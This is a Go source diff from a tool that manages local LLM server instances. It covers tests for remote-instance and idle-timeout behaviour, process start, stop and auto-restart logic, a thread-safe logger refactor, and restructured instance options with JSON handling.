		t.Error("Expected error when stopping non-running instance")
	}

	// Pretend the instance is running without launching a process.
	inst.SetStatus(instance.Running)

	// Starting a running instance must be rejected.
	if startErr := inst.Start(); startErr == nil {
		t.Error("Expected error when starting already running instance")
	}
}
// TestRemoteInstanceOperations verifies that an instance assigned only to a
// non-local node is reported as remote and that the local process operations
// (Start, Stop, Restart, GetLogs) all return errors for it.
func TestRemoteInstanceOperations(t *testing.T) {
	cfg := &config.AppConfig{
		Backends: config.BackendConfig{
			LlamaCpp: config.BackendSettings{Command: "llama-server"},
		},
		Instances: config.InstancesConfig{LogsDir: "/tmp/test"},
		Nodes: map[string]config.NodeConfig{
			"remote-node": {Address: "http://remote-node:8080"},
		},
		LocalNode: "main",
	}
	opts := &instance.Options{
		Nodes: map[string]struct{}{"remote-node": {}}, // Remote instance
		BackendOptions: backends.Options{
			BackendType: backends.BackendTypeLlamaCpp,
			LlamaServerOptions: &backends.LlamaServerOptions{
				Model: "/path/to/model.gguf",
			},
		},
	}

	inst := instance.New("remote-test", cfg, opts, nil)
	if !inst.IsRemote() {
		t.Error("Expected instance to be remote")
	}

	// Each operation below must be refused for a remote instance; they are
	// run in this fixed order.
	rejected := []struct {
		failure string
		run     func() error
	}{
		{"Expected error when starting remote instance", inst.Start},
		{"Expected error when stopping remote instance", inst.Stop},
		{"Expected error when restarting remote instance", inst.Restart},
		{"Expected error when getting logs for remote instance", func() error {
			_, err := inst.GetLogs(10)
			return err
		}},
	}
	for _, op := range rejected {
		if err := op.run(); err == nil {
			t.Error(op.failure)
		}
	}
}
// TestIdleTimeout covers three ShouldTimeout scenarios: an instance that is
// not running, a running instance with no idle timeout configured, and a
// running instance whose idle time (driven by a mock clock) exceeds the timeout.
func TestIdleTimeout(t *testing.T) {
	cfg := &config.AppConfig{
		Backends: config.BackendConfig{
			LlamaCpp: config.BackendSettings{Command: "llama-server"},
		},
		Instances: config.InstancesConfig{LogsDir: "/tmp/test"},
		Nodes:     map[string]config.NodeConfig{},
		LocalNode: "main",
	}

	// idleOptions builds llama.cpp options with the given idle timeout.
	idleOptions := func(idle *int, llama *backends.LlamaServerOptions) *instance.Options {
		return &instance.Options{
			IdleTimeout: idle,
			BackendOptions: backends.Options{
				BackendType:        backends.BackendTypeLlamaCpp,
				LlamaServerOptions: llama,
			},
		}
	}

	t.Run("not running never times out", func(t *testing.T) {
		minutes := 1
		inst := instance.New("test", cfg, idleOptions(&minutes, &backends.LlamaServerOptions{
			Model: "/path/to/model.gguf",
		}), nil)

		if inst.ShouldTimeout() {
			t.Error("Non-running instance should never timeout")
		}
	})

	t.Run("no timeout configured", func(t *testing.T) {
		// A nil idle timeout means no timeout is configured.
		inst := instance.New("test", cfg, idleOptions(nil, &backends.LlamaServerOptions{
			Model: "/path/to/model.gguf",
		}), nil)
		inst.SetStatus(instance.Running)

		if inst.ShouldTimeout() {
			t.Error("Instance with no timeout configured should not timeout")
		}
	})

	t.Run("timeout exceeded", func(t *testing.T) {
		minutes := 1 // 1 minute
		inst := instance.New("test", cfg, idleOptions(&minutes, &backends.LlamaServerOptions{
			Model: "/path/to/model.gguf",
			Host:  "localhost",
			Port:  8080,
		}), nil)
		inst.SetStatus(instance.Running)

		// Drive the instance from a controllable clock.
		clock := &mockTimeProvider{currentTime: time.Now().Unix()}
		inst.SetTimeProvider(clock)

		// Record "now" as the last request time.
		inst.UpdateLastRequestTime()

		// Jump two minutes ahead, past the one minute timeout.
		clock.currentTime = time.Now().Add(2 * time.Minute).Unix()

		if !inst.ShouldTimeout() {
			t.Error("Instance should timeout when idle time exceeds configured timeout")
		}
	})
}
// mockTimeProvider is a settable clock for timeout testing.
type mockTimeProvider struct {
	currentTime int64 // Unix timestamp, in seconds
}

// Now returns the stored Unix timestamp as a time.Time with zero nanoseconds.
func (p *mockTimeProvider) Now() time.Time {
	const nanos = 0
	return time.Unix(p.currentTime, nanos)
}

View File

@@ -1,412 +0,0 @@
package instance
import (
"context"
"fmt"
"log"
"net/http"
"os/exec"
"runtime"
"syscall"
"time"
"llamactl/pkg/backends"
"llamactl/pkg/config"
)
// Start starts the llama server instance and returns an error if it fails.
//
// It holds the instance lock for the whole call. It refuses to start an
// instance that is already running or that has no options. On success the
// status is set to Running and goroutines are launched to read stdout and
// stderr into the logger and to monitor the process.
//
// On every failure after the context has been created, the context is
// cancelled, and the log files are closed once they have been opened, so a
// failed start does not leave them behind.
func (i *Process) Start() error {
	i.mu.Lock()
	defer i.mu.Unlock()

	if i.IsRunning() {
		return fmt.Errorf("instance %s is already running", i.Name)
	}

	// Safety check: ensure options are valid
	if i.options == nil {
		return fmt.Errorf("instance %s has no options set", i.Name)
	}

	// Reset restart counter when manually starting (not during auto-restart)
	// We can detect auto-restart by checking if restartCancel is set
	if i.restartCancel == nil {
		i.restarts = 0
	}

	// Initialize last request time to current time when starting
	i.lastRequestTime.Store(i.timeProvider.Now().Unix())

	// Create context before building command (needed for CommandContext)
	i.ctx, i.cancel = context.WithCancel(context.Background())

	// Create log files
	if err := i.logger.Create(); err != nil {
		i.cancel()
		return fmt.Errorf("failed to create log files: %w", err)
	}

	// Build command using backend-specific methods
	cmd, cmdErr := i.buildCommand()
	if cmdErr != nil {
		// The log files are already open at this point; close them like the
		// pipe failure paths below do.
		i.logger.Close()
		i.cancel()
		return fmt.Errorf("failed to build command: %w", cmdErr)
	}
	i.cmd = cmd

	if runtime.GOOS != "windows" {
		setProcAttrs(i.cmd)
	}

	var err error
	i.stdout, err = i.cmd.StdoutPipe()
	if err != nil {
		i.logger.Close()
		i.cancel()
		return fmt.Errorf("failed to get stdout pipe: %w", err)
	}
	i.stderr, err = i.cmd.StderrPipe()
	if err != nil {
		i.stdout.Close()
		i.logger.Close()
		i.cancel()
		return fmt.Errorf("failed to get stderr pipe: %w", err)
	}

	if err := i.cmd.Start(); err != nil {
		// No reader goroutines were started, so nothing else will close the
		// log files for this attempt.
		i.logger.Close()
		i.cancel()
		return fmt.Errorf("failed to start instance %s: %w", i.Name, err)
	}

	i.SetStatus(Running)

	// Create channel for monitor completion signaling
	i.monitorDone = make(chan struct{})

	go i.logger.readOutput(i.stdout)
	go i.logger.readOutput(i.stderr)
	go i.monitorProcess()

	return nil
}
// Stop terminates the subprocess.
//
// If the instance is not running, any pending restart is cancelled and an
// error is returned. Otherwise the status is set to Stopped, the proxy is
// cleared, and SIGINT is sent to the process. Stop then waits up to 30 seconds
// for the monitor goroutine to signal completion; after that it force kills
// the process and waits up to 2 more seconds. The logger is closed before
// returning nil.
func (i *Process) Stop() error {
	i.mu.Lock()

	if !i.IsRunning() {
		// Even if not running, cancel any pending restart
		if i.restartCancel != nil {
			i.restartCancel()
			i.restartCancel = nil
			log.Printf("Cancelled pending restart for instance %s", i.Name)
		}
		i.mu.Unlock()
		return fmt.Errorf("instance %s is not running", i.Name)
	}

	// Cancel any pending restart
	if i.restartCancel != nil {
		i.restartCancel()
		i.restartCancel = nil
	}

	// Set status to stopped first to signal intentional stop
	i.SetStatus(Stopped)

	// Clean up the proxy
	i.proxy = nil

	// Get the monitor done channel before releasing the lock
	monitorDone := i.monitorDone

	// The lock is released here so the waits below do not hold it.
	// NOTE(review): i.cmd is read below without the lock — confirm nothing
	// else reassigns it concurrently.
	i.mu.Unlock()

	// Stop the process with SIGINT if cmd exists
	if i.cmd != nil && i.cmd.Process != nil {
		// A failed signal is only logged; the wait below still applies.
		if err := i.cmd.Process.Signal(syscall.SIGINT); err != nil {
			log.Printf("Failed to send SIGINT to instance %s: %v", i.Name, err)
		}
	}

	// If no process exists, we can return immediately
	if i.cmd == nil || monitorDone == nil {
		i.logger.Close()
		return nil
	}

	select {
	case <-monitorDone:
		// Process exited normally
	case <-time.After(30 * time.Second):
		// Force kill if it doesn't exit within 30 seconds
		if i.cmd != nil && i.cmd.Process != nil {
			killErr := i.cmd.Process.Kill()
			if killErr != nil {
				log.Printf("Failed to force kill instance %s: %v", i.Name, killErr)
			}
			// This message is logged whether or not Kill returned an error.
			log.Printf("Instance %s did not stop in time, force killed", i.Name)

			// Wait a bit more for the monitor to finish after force kill
			select {
			case <-monitorDone:
				// Monitor completed after force kill
			case <-time.After(2 * time.Second):
				log.Printf("Warning: Monitor goroutine did not complete after force kill for instance %s", i.Name)
			}
		}
	}

	i.logger.Close()

	return nil
}
// LastRequestTime returns the value currently held in the instance's
// lastRequestTime atomic.
func (i *Process) LastRequestTime() int64 {
	stamp := i.lastRequestTime.Load()
	return stamp
}
// WaitForHealthy polls the backend's /health endpoint until it answers
// 200 OK or the timeout (in seconds) elapses. A non-positive timeout falls
// back to 30 seconds.
//
// It returns an error when the instance is not running, has no options, or
// does not become healthy in time.
func (i *Process) WaitForHealthy(timeout int) error {
	if !i.IsRunning() {
		return fmt.Errorf("instance %s is not running", i.Name)
	}

	if timeout <= 0 {
		timeout = 30 // Default to 30 seconds if no timeout is specified
	}

	ctx, cancel := context.WithTimeout(context.Background(), time.Duration(timeout)*time.Second)
	defer cancel()

	opts := i.GetOptions()
	if opts == nil {
		return fmt.Errorf("instance %s has no options set", i.Name)
	}

	// Pick host/port from whichever backend-specific options are populated
	// for the configured backend type; otherwise both stay at zero values.
	host, port := "", 0
	switch backendType := opts.BackendType; {
	case backendType == backends.BackendTypeLlamaCpp && opts.LlamaServerOptions != nil:
		host, port = opts.LlamaServerOptions.Host, opts.LlamaServerOptions.Port
	case backendType == backends.BackendTypeMlxLm && opts.MlxServerOptions != nil:
		host, port = opts.MlxServerOptions.Host, opts.MlxServerOptions.Port
	case backendType == backends.BackendTypeVllm && opts.VllmServerOptions != nil:
		host, port = opts.VllmServerOptions.Host, opts.VllmServerOptions.Port
	}
	if host == "" {
		host = "localhost"
	}
	healthURL := fmt.Sprintf("http://%s:%d/health", host, port)

	// Dedicated client so every probe is capped at 5 seconds
	client := &http.Client{Timeout: 5 * time.Second}

	// probe performs one GET and reports whether the backend answered 200 OK
	probe := func() bool {
		req, reqErr := http.NewRequestWithContext(ctx, "GET", healthURL, nil)
		if reqErr != nil {
			return false
		}
		resp, doErr := client.Do(req)
		if doErr != nil {
			return false
		}
		defer resp.Body.Close()
		return resp.StatusCode == http.StatusOK
	}

	// One immediate attempt before falling back to polling once per second
	if probe() {
		return nil
	}

	ticker := time.NewTicker(1 * time.Second)
	defer ticker.Stop()

	for {
		select {
		case <-ticker.C:
			if probe() {
				return nil
			}
		case <-ctx.Done():
			return fmt.Errorf("timeout waiting for instance %s to become healthy after %d seconds", i.Name, timeout)
		}
	}
}
// monitorProcess waits for the subprocess to exit and reacts to the exit.
//
// An exit observed while the instance is no longer marked running is treated
// as intentional and ignored. Otherwise the instance is marked Stopped, the
// logger is closed and, when the process exited with an error, the
// auto-restart logic is invoked. The run's monitorDone channel is closed when
// this function returns.
func (i *Process) monitorProcess() {
	// Snapshot the command and completion channel that belong to THIS run.
	// handleRestart may call Start before this function returns, which
	// replaces i.cmd and i.monitorDone; the deferred cleanup must not close
	// the channel of the freshly started process.
	i.mu.Lock()
	cmd := i.cmd
	done := i.monitorDone
	i.mu.Unlock()

	defer func() {
		i.mu.Lock()
		if done != nil {
			close(done)
		}
		// Only clear the field if it still refers to this run's channel
		if i.monitorDone == done {
			i.monitorDone = nil
		}
		i.mu.Unlock()
	}()

	err := cmd.Wait()

	i.mu.Lock()

	// Check if the instance was intentionally stopped
	if !i.IsRunning() {
		i.mu.Unlock()
		return
	}

	i.SetStatus(Stopped)
	i.logger.Close()

	// Cancel any existing restart context since we're handling a new exit
	if i.restartCancel != nil {
		i.restartCancel()
		i.restartCancel = nil
	}

	// Log the exit
	if err != nil {
		log.Printf("Instance %s crashed with error: %v", i.Name, err)
		// handleRestart is entered with the lock held and releases it itself
		i.handleRestart()
	} else {
		log.Printf("Instance %s exited cleanly", i.Name)
		i.mu.Unlock()
	}
}
// handleRestart manages the restart process.
//
// It must be called with i.mu held and always releases the lock before
// returning. When restart conditions are not met the instance is marked
// Failed. Otherwise it waits for the configured delay (cancellable through
// i.restartCancel) and then calls Start.
func (i *Process) handleRestart() {
	// Validate restart conditions and get safe parameters
	shouldRestart, maxRestarts, restartDelay := i.validateRestartConditions()
	if !shouldRestart {
		i.SetStatus(Failed)
		i.mu.Unlock()
		return
	}

	i.restarts++
	delay := time.Duration(restartDelay) * time.Second
	log.Printf("Auto-restarting instance %s (attempt %d/%d) in %v",
		i.Name, i.restarts, maxRestarts, delay)

	// Create a cancellable context for the restart delay
	restartCtx, cancel := context.WithCancel(context.Background())
	i.restartCancel = cancel

	// Release the lock before sleeping
	i.mu.Unlock()

	// Context-aware sleep; the timer is stopped on return so a cancelled
	// restart does not leave it pending for the rest of the delay.
	timer := time.NewTimer(delay)
	defer timer.Stop()

	select {
	case <-timer.C:
		// Sleep completed normally, continue with restart
	case <-restartCtx.Done():
		// Restart was cancelled
		log.Printf("Restart cancelled for instance %s", i.Name)
		return
	}

	// restartCancel stays set during Start so that Start can tell an
	// auto-restart from a manual start.
	err := i.Start()

	// The delay context has served its purpose: release it and clear the
	// marker whether or not the start succeeded, so a later manual start is
	// not mistaken for an auto-restart.
	i.mu.Lock()
	cancel()
	i.restartCancel = nil
	i.mu.Unlock()

	if err != nil {
		log.Printf("Failed to restart instance %s: %v", i.Name, err)
		return
	}
	log.Printf("Successfully restarted instance %s", i.Name)
}
// validateRestartConditions decides whether an auto-restart may happen.
//
// It returns (true, maxRestarts, restartDelay) when the options enable
// auto-restart, both limits are set and the restart budget is not exhausted.
// In every other case it logs the reason and returns (false, 0, 0).
func (i *Process) validateRestartConditions() (shouldRestart bool, maxRestarts int, restartDelay int) {
	cfg := i.options

	switch {
	case cfg == nil:
		log.Printf("Instance %s not restarting: options are nil", i.Name)
		return false, 0, 0
	case cfg.AutoRestart == nil || !*cfg.AutoRestart:
		log.Printf("Instance %s not restarting: AutoRestart is disabled", i.Name)
		return false, 0, 0
	case cfg.MaxRestarts == nil:
		log.Printf("Instance %s not restarting: MaxRestarts is nil", i.Name)
		return false, 0, 0
	case cfg.RestartDelay == nil:
		log.Printf("Instance %s not restarting: RestartDelay is nil", i.Name)
		return false, 0, 0
	}

	// Values are already validated during unmarshaling/SetOptions
	limit, delay := *cfg.MaxRestarts, *cfg.RestartDelay
	if i.restarts >= limit {
		log.Printf("Instance %s exceeded max restart attempts (%d)", i.Name, limit)
		return false, 0, 0
	}

	return true, limit, delay
}
// buildCommand assembles the exec.Cmd for this instance from the resolved
// backend configuration: executable, arguments and environment. The command
// is bound to i.ctx and its environment consists solely of the variables
// returned by BuildEnvironment.
func (i *Process) buildCommand() (*exec.Cmd, error) {
	backendConfig, err := i.getBackendConfig()
	if err != nil {
		return nil, err
	}

	envVars := i.options.BuildEnvironment(backendConfig)
	executable := i.options.GetCommand(backendConfig)
	argv := i.options.BuildCommandArgs(backendConfig)

	cmd := exec.CommandContext(i.ctx, executable, argv...)

	// Non-nil (possibly empty) slice: only the variables below are passed on
	environ := make([]string, 0, len(envVars))
	for key, value := range envVars {
		environ = append(environ, key+"="+value)
	}
	cmd.Env = environ

	return cmd, nil
}
// getBackendConfig looks up the global backend settings that match the
// instance's backend type. Unsupported backend types yield an error.
func (i *Process) getBackendConfig() (*config.BackendSettings, error) {
	// Settings key used for each supported backend type
	settingsKeys := map[backends.BackendType]string{
		backends.BackendTypeLlamaCpp: "llama-cpp",
		backends.BackendTypeMlxLm:    "mlx",
		backends.BackendTypeVllm:     "vllm",
	}

	key, supported := settingsKeys[i.options.BackendType]
	if !supported {
		return nil, fmt.Errorf("unsupported backend type: %s", i.options.BackendType)
	}

	resolved := i.globalBackendSettings.GetBackendSettings(key)
	return &resolved, nil
}

View File

@@ -6,25 +6,31 @@ import (
"io"
"os"
"strings"
"sync"
"sync/atomic"
"time"
)
type InstanceLogger struct {
type logger struct {
name string
logDir string
logFile *os.File
logFile atomic.Pointer[os.File]
logFilePath string
mu sync.RWMutex
}
func NewInstanceLogger(name string, logDir string) *InstanceLogger {
return &InstanceLogger{
func newLogger(name string, logDir string) *logger {
return &logger{
name: name,
logDir: logDir,
}
}
// Create creates and opens the log files for stdout and stderr
func (i *InstanceLogger) Create() error {
// create creates and opens the log files for stdout and stderr
func (i *logger) create() error {
i.mu.Lock()
defer i.mu.Unlock()
if i.logDir == "" {
return fmt.Errorf("logDir is empty for instance %s", i.name)
}
@@ -42,26 +48,25 @@ func (i *InstanceLogger) Create() error {
return fmt.Errorf("failed to create stdout log file: %w", err)
}
i.logFile = logFile
i.logFile.Store(logFile)
// Write a startup marker to both files
timestamp := time.Now().Format("2006-01-02 15:04:05")
fmt.Fprintf(i.logFile, "\n=== Instance %s started at %s ===\n", i.name, timestamp)
fmt.Fprintf(logFile, "\n=== Instance %s started at %s ===\n", i.name, timestamp)
return nil
}
// GetLogs retrieves the last n lines of logs from the instance
func (i *Process) GetLogs(num_lines int) (string, error) {
// getLogs retrieves the last n lines of logs from the instance
func (i *logger) getLogs(num_lines int) (string, error) {
i.mu.RLock()
logFileName := i.logger.logFilePath
i.mu.RUnlock()
defer i.mu.RUnlock()
if logFileName == "" {
return "", fmt.Errorf("log file not created for instance %s", i.Name)
if i.logFilePath == "" {
return "", fmt.Errorf("log file not created for instance %s", i.name)
}
file, err := os.Open(logFileName)
file, err := os.Open(i.logFilePath)
if err != nil {
return "", fmt.Errorf("failed to open log file: %w", err)
}
@@ -93,26 +98,30 @@ func (i *Process) GetLogs(num_lines int) (string, error) {
return strings.Join(lines[start:], "\n"), nil
}
// closeLogFile closes the log files
func (i *InstanceLogger) Close() {
if i.logFile != nil {
// close closes the log files
func (i *logger) close() {
i.mu.Lock()
defer i.mu.Unlock()
logFile := i.logFile.Swap(nil)
if logFile != nil {
timestamp := time.Now().Format("2006-01-02 15:04:05")
fmt.Fprintf(i.logFile, "=== Instance %s stopped at %s ===\n\n", i.name, timestamp)
i.logFile.Close()
i.logFile = nil
fmt.Fprintf(logFile, "=== Instance %s stopped at %s ===\n\n", i.name, timestamp)
logFile.Sync() // Ensure all buffered data is written to disk
logFile.Close()
}
}
// readOutput reads from the given reader and writes lines to the log file
func (i *InstanceLogger) readOutput(reader io.ReadCloser) {
func (i *logger) readOutput(reader io.ReadCloser) {
defer reader.Close()
scanner := bufio.NewScanner(reader)
for scanner.Scan() {
line := scanner.Text()
if i.logFile != nil {
fmt.Fprintln(i.logFile, line)
i.logFile.Sync() // Ensure data is written to disk
// Use atomic load to avoid lock contention on every line
if logFile := i.logFile.Load(); logFile != nil {
fmt.Fprintln(logFile, line)
}
}
}

View File

@@ -4,15 +4,14 @@ import (
"encoding/json"
"fmt"
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/backends/mlx"
"llamactl/pkg/backends/vllm"
"llamactl/pkg/config"
"log"
"maps"
"slices"
"sync"
)
type CreateInstanceOptions struct {
// Options contains the actual configuration (exported - this is the public API).
type Options struct {
// Auto restart
AutoRestart *bool `json:"auto_restart,omitempty"`
MaxRestarts *int `json:"max_restarts,omitempty"`
@@ -21,23 +20,79 @@ type CreateInstanceOptions struct {
OnDemandStart *bool `json:"on_demand_start,omitempty"`
// Idle timeout
IdleTimeout *int `json:"idle_timeout,omitempty"` // minutes
//Environment variables
// Environment variables
Environment map[string]string `json:"environment,omitempty"`
BackendType backends.BackendType `json:"backend_type"`
BackendOptions map[string]any `json:"backend_options,omitempty"`
// Backend-specific options
LlamaServerOptions *llamacpp.LlamaServerOptions `json:"-"`
MlxServerOptions *mlx.MlxServerOptions `json:"-"`
VllmServerOptions *vllm.VllmServerOptions `json:"-"`
// Assigned nodes
Nodes map[string]struct{} `json:"-"`
// Backend options
BackendOptions backends.Options `json:"-"`
}
// UnmarshalJSON implements custom JSON unmarshaling for CreateInstanceOptions
func (c *CreateInstanceOptions) UnmarshalJSON(data []byte) error {
// options wraps Options with thread-safe access (unexported).
// All accessors below take mu before touching opts.
type options struct {
// mu guards opts: read-locked by the getters and MarshalJSON, write-locked
// by set and UnmarshalJSON.
mu sync.RWMutex
// opts is the currently active configuration; it may be nil until set or
// UnmarshalJSON populates it.
opts *Options
}
// newOptions wraps the given Options pointer in a lock-protected holder.
// The pointer is stored as-is; no copy is made.
func newOptions(opts *Options) *options {
	wrapper := new(options)
	wrapper.opts = opts
	return wrapper
}
// get returns the currently stored *Options under a read lock.
// NOTE: this is the stored pointer itself, not a copy, so the returned value
// is shared with the wrapper and with every other caller of get.
func (o *options) get() *Options {
o.mu.RLock()
defer o.mu.RUnlock()
return o.opts
}
// set replaces the stored options pointer under the write lock.
func (o *options) set(opts *Options) {
	o.mu.Lock()
	o.opts = opts
	o.mu.Unlock()
}
// GetHost returns the host reported by the stored backend options.
// It reads under the read lock and dereferences o.opts without a nil check.
func (o *options) GetHost() string {
	o.mu.RLock()
	defer o.mu.RUnlock()

	backend := &o.opts.BackendOptions
	return backend.GetHost()
}
// GetPort returns the port reported by the stored backend options.
// It reads under the read lock and dereferences o.opts without a nil check.
func (o *options) GetPort() int {
	o.mu.RLock()
	defer o.mu.RUnlock()

	backend := &o.opts.BackendOptions
	return backend.GetPort()
}
// MarshalJSON implements json.Marshaler for the options wrapper by
// delegating to the wrapped Options while holding the read lock.
func (o *options) MarshalJSON() ([]byte, error) {
	o.mu.RLock()
	defer o.mu.RUnlock()

	current := o.opts
	return current.MarshalJSON()
}
// UnmarshalJSON implements json.Unmarshaler for the options wrapper.
// It decodes into the wrapped Options under the write lock, allocating an
// empty Options first when none is stored yet.
func (o *options) UnmarshalJSON(data []byte) error {
	o.mu.Lock()
	defer o.mu.Unlock()

	target := o.opts
	if target == nil {
		target = &Options{}
		o.opts = target
	}
	return target.UnmarshalJSON(data)
}
// UnmarshalJSON implements custom JSON unmarshaling for Options
func (c *Options) UnmarshalJSON(data []byte) error {
// Use anonymous struct to avoid recursion
type Alias CreateInstanceOptions
type Alias Options
aux := &struct {
Nodes []string `json:"nodes,omitempty"`
BackendType backends.BackendType `json:"backend_type"`
BackendOptions map[string]any `json:"backend_options,omitempty"`
*Alias
}{
Alias: (*Alias)(c),
@@ -47,113 +102,88 @@ func (c *CreateInstanceOptions) UnmarshalJSON(data []byte) error {
return err
}
// Parse backend-specific options
switch c.BackendType {
case backends.BackendTypeLlamaCpp:
if c.BackendOptions != nil {
// Convert map to JSON and then unmarshal to LlamaServerOptions
optionsData, err := json.Marshal(c.BackendOptions)
if err != nil {
return fmt.Errorf("failed to marshal backend options: %w", err)
}
c.LlamaServerOptions = &llamacpp.LlamaServerOptions{}
if err := json.Unmarshal(optionsData, c.LlamaServerOptions); err != nil {
return fmt.Errorf("failed to unmarshal llama.cpp options: %w", err)
}
// Convert nodes array to map
if len(aux.Nodes) > 0 {
c.Nodes = make(map[string]struct{}, len(aux.Nodes))
for _, node := range aux.Nodes {
c.Nodes[node] = struct{}{}
}
case backends.BackendTypeMlxLm:
if c.BackendOptions != nil {
optionsData, err := json.Marshal(c.BackendOptions)
if err != nil {
return fmt.Errorf("failed to marshal backend options: %w", err)
}
}
c.MlxServerOptions = &mlx.MlxServerOptions{}
if err := json.Unmarshal(optionsData, c.MlxServerOptions); err != nil {
return fmt.Errorf("failed to unmarshal MLX options: %w", err)
}
}
case backends.BackendTypeVllm:
if c.BackendOptions != nil {
optionsData, err := json.Marshal(c.BackendOptions)
if err != nil {
return fmt.Errorf("failed to marshal backend options: %w", err)
}
// Create backend options struct and unmarshal
c.BackendOptions = backends.Options{
BackendType: aux.BackendType,
BackendOptions: aux.BackendOptions,
}
c.VllmServerOptions = &vllm.VllmServerOptions{}
if err := json.Unmarshal(optionsData, c.VllmServerOptions); err != nil {
return fmt.Errorf("failed to unmarshal vLLM options: %w", err)
}
}
default:
return fmt.Errorf("unknown backend type: %s", c.BackendType)
// Marshal the backend options to JSON for proper unmarshaling
backendJson, err := json.Marshal(struct {
BackendType backends.BackendType `json:"backend_type"`
BackendOptions map[string]any `json:"backend_options,omitempty"`
}{
BackendType: aux.BackendType,
BackendOptions: aux.BackendOptions,
})
if err != nil {
return fmt.Errorf("failed to marshal backend options: %w", err)
}
// Unmarshal into the backends.Options struct to trigger its custom unmarshaling
if err := json.Unmarshal(backendJson, &c.BackendOptions); err != nil {
return fmt.Errorf("failed to unmarshal backend options: %w", err)
}
return nil
}
// MarshalJSON implements custom JSON marshaling for CreateInstanceOptions
func (c *CreateInstanceOptions) MarshalJSON() ([]byte, error) {
// MarshalJSON implements custom JSON marshaling for Options
func (c *Options) MarshalJSON() ([]byte, error) {
// Use anonymous struct to avoid recursion
type Alias CreateInstanceOptions
type Alias Options
aux := struct {
Nodes []string `json:"nodes,omitempty"` // Output as JSON array
BackendType backends.BackendType `json:"backend_type"`
BackendOptions map[string]any `json:"backend_options,omitempty"`
*Alias
}{
Alias: (*Alias)(c),
}
// Convert backend-specific options back to BackendOptions map for JSON
switch c.BackendType {
case backends.BackendTypeLlamaCpp:
if c.LlamaServerOptions != nil {
data, err := json.Marshal(c.LlamaServerOptions)
if err != nil {
return nil, fmt.Errorf("failed to marshal llama server options: %w", err)
}
var backendOpts map[string]any
if err := json.Unmarshal(data, &backendOpts); err != nil {
return nil, fmt.Errorf("failed to unmarshal to map: %w", err)
}
aux.BackendOptions = backendOpts
}
case backends.BackendTypeMlxLm:
if c.MlxServerOptions != nil {
data, err := json.Marshal(c.MlxServerOptions)
if err != nil {
return nil, fmt.Errorf("failed to marshal MLX server options: %w", err)
}
var backendOpts map[string]any
if err := json.Unmarshal(data, &backendOpts); err != nil {
return nil, fmt.Errorf("failed to unmarshal to map: %w", err)
}
aux.BackendOptions = backendOpts
}
case backends.BackendTypeVllm:
if c.VllmServerOptions != nil {
data, err := json.Marshal(c.VllmServerOptions)
if err != nil {
return nil, fmt.Errorf("failed to marshal vLLM server options: %w", err)
}
var backendOpts map[string]any
if err := json.Unmarshal(data, &backendOpts); err != nil {
return nil, fmt.Errorf("failed to unmarshal to map: %w", err)
}
aux.BackendOptions = backendOpts
// Convert nodes map to array (sorted for consistency)
if len(c.Nodes) > 0 {
aux.Nodes = make([]string, 0, len(c.Nodes))
for node := range c.Nodes {
aux.Nodes = append(aux.Nodes, node)
}
// Sort for consistent output
slices.Sort(aux.Nodes)
}
// Set backend type
aux.BackendType = c.BackendOptions.BackendType
// Marshal the backends.Options struct to get the properly formatted backend options
// Marshal a pointer to trigger the pointer receiver MarshalJSON method
backendData, err := json.Marshal(&c.BackendOptions)
if err != nil {
return nil, fmt.Errorf("failed to marshal backend options: %w", err)
}
// Unmarshal into a temporary struct to extract the backend_options map
var tempBackend struct {
BackendOptions map[string]any `json:"backend_options,omitempty"`
}
if err := json.Unmarshal(backendData, &tempBackend); err != nil {
return nil, fmt.Errorf("failed to unmarshal backend data: %w", err)
}
aux.BackendOptions = tempBackend.BackendOptions
return json.Marshal(aux)
}
// ValidateAndApplyDefaults validates the instance options and applies constraints
func (c *CreateInstanceOptions) ValidateAndApplyDefaults(name string, globalSettings *config.InstancesConfig) {
// validateAndApplyDefaults validates the instance options and applies constraints
func (c *Options) validateAndApplyDefaults(name string, globalSettings *config.InstancesConfig) {
// Validate and apply constraints
if c.MaxRestarts != nil && *c.MaxRestarts < 0 {
log.Printf("Instance %s MaxRestarts value (%d) cannot be negative, setting to 0", name, *c.MaxRestarts)
@@ -190,76 +220,3 @@ func (c *CreateInstanceOptions) ValidateAndApplyDefaults(name string, globalSett
}
}
}
// GetCommand returns the executable to launch: "docker" when Docker is
// enabled for the backend (never for the MLX backend), otherwise the
// backend's configured command.
func (c *CreateInstanceOptions) GetCommand(backendConfig *config.BackendSettings) string {
	docker := backendConfig.Docker
	viaDocker := docker != nil && docker.Enabled && c.BackendType != backends.BackendTypeMlxLm
	if !viaDocker {
		return backendConfig.Command
	}
	return "docker"
}
// BuildCommandArgs builds command line arguments for the backend.
//
// With Docker enabled (never for the MLX backend) the result is the Docker
// args, the image, then the backend's Docker-specific args. Otherwise it is
// the backend's configured args followed by the backend-specific args.
// Backend-specific args are only added when the matching options are set.
func (c *CreateInstanceOptions) BuildCommandArgs(backendConfig *config.BackendSettings) []string {
	var args []string

	docker := backendConfig.Docker
	viaDocker := docker != nil && docker.Enabled && c.BackendType != backends.BackendTypeMlxLm

	if viaDocker {
		// For Docker, start with Docker args followed by the image
		args = append(args, docker.Args...)
		args = append(args, docker.Image)

		switch backendType := c.BackendType; {
		case backendType == backends.BackendTypeLlamaCpp && c.LlamaServerOptions != nil:
			args = append(args, c.LlamaServerOptions.BuildDockerArgs()...)
		case backendType == backends.BackendTypeVllm && c.VllmServerOptions != nil:
			args = append(args, c.VllmServerOptions.BuildDockerArgs()...)
		}
		return args
	}

	// For native execution, start with backend args
	args = append(args, backendConfig.Args...)

	switch backendType := c.BackendType; {
	case backendType == backends.BackendTypeLlamaCpp && c.LlamaServerOptions != nil:
		args = append(args, c.LlamaServerOptions.BuildCommandArgs()...)
	case backendType == backends.BackendTypeMlxLm && c.MlxServerOptions != nil:
		args = append(args, c.MlxServerOptions.BuildCommandArgs()...)
	case backendType == backends.BackendTypeVllm && c.VllmServerOptions != nil:
		args = append(args, c.VllmServerOptions.BuildCommandArgs()...)
	}
	return args
}
// BuildEnvironment merges environment variables in increasing priority:
// backend settings, then Docker settings (only when Docker is enabled and
// the backend is not MLX), then the instance's own Environment.
func (c *CreateInstanceOptions) BuildEnvironment(backendConfig *config.BackendSettings) map[string]string {
	merged := make(map[string]string)

	// maps.Copy is a no-op for a nil source map, so no nil guards are needed
	maps.Copy(merged, backendConfig.Environment)

	docker := backendConfig.Docker
	if docker != nil && docker.Enabled && c.BackendType != backends.BackendTypeMlxLm {
		maps.Copy(merged, docker.Environment)
	}

	maps.Copy(merged, c.Environment)
	return merged
}

428
pkg/instance/process.go Normal file
View File

